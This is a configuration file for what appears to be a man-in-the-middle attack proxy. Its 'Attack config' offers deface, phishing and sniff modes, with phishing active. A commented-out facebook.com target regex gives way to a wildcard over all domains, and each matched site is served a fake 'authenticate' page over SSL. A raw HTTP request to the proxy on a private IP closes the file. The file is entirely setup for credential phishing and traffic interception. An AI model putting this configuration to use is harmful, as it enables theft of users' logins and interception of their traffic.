#################################################
############### Engine config ###################
proxy.server.port=4428
web.server.port=4429

#################################################
############### Attack config ###################
#mode=deface
mode=phishing
#mode=sniff

#################################################
############### Deface config #################
deface.page=amnafzar_authenticate.html

#################################################
############### Phishing config #################
#phishing.method=smart
phishing.method=static

#phishing.target.domain=^(.*\\.+)*facebook.com
phishing.target.domain=^(.*\\.+)*
phishing.page=amnafzar_authenticate.html
#################################################
################# Log config ####################
log.level=5

#################################################
################## ? config #####################
ssl=enable
#ssl=disable



GET / HTTP/1.1
Host: 192.168.16.63:4428
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0